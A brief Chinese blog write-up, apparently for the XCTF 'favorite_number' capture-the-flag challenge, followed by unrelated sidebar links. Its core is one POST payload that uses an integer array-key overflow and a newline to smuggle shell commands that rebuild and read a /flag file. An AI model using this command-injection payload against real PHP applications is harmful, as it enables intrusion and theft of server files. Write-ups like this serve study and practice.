当前位置:网站首页>攻防世界-favorite_number
攻防世界-favorite_number
2022-08-02 17:13:00 【NCNIPC梅苑】
favorite_number
首先泄露了php的版本
同其他师傅的payload不同的是
我的post数据中多了个分号;
最后是通过写文件打印文件的形式拿到的flag
stuff[4294967296]=admin&stuff[1]=user&num=123%0Aprintf /fla > /tmp/hello %26%26 printf g >> /tmp/hello %26%26 tac `tac /tmp/hello`;
边栏推荐
- 用函数递归的方法解决汉诺塔问题
- golang源码分析(5):sync.Once
- Navicat premium download and install 15 detailed tutorial
- 实时数仓架构演进及选型
- “蔚来杯“2022牛客暑期多校训练营4 E - Jobs (Hard Version)
- 使用lodash替换js字符串中的变量
- oracle 和mysql 语句结果不一致问题
- The days of patching are more difficult than the days of writing code
- Since September, China has granted zero-tariff treatment to 98% of tax items from 16 countries including Togo
- mui中使用多级选择器实现省市区联动
猜你喜欢
随机推荐
golang刷leetcode动态规划(8)盈利计划
智能合约安全——delegatecall (1)
Nacos interview questions
本地MSE播放fragment mp4服务
边界访问的空间权限
安全至上:落地DevSecOps最佳实践你不得不知道的工具
土巴兔IPO五次折戟,互联网家装未解“中介”之痛
启航
如何生成随机数+原理详细分析
erp系统和wms系统有什么区别
牛津硕士进碳圈,高瓴红杉经纬一起投了
Nacos配置中心工作原理(超简单)
持续集成(三)Jenkins新增节点
ECCV 2022 | 清华&腾讯AI Lab提出REALY:重新思考3D人脸重建的评估方法
Pytest学习笔记
Flink Learning 9: Configure the idea to develop the flink-Scala program environment
golang源码分析(8):m、p、g、shedt、sudog
ES: export 的用法
德国客户对文档管理系统、工作流自动化软件 DocuWare 的评价
一篇文章带你搞定BFC~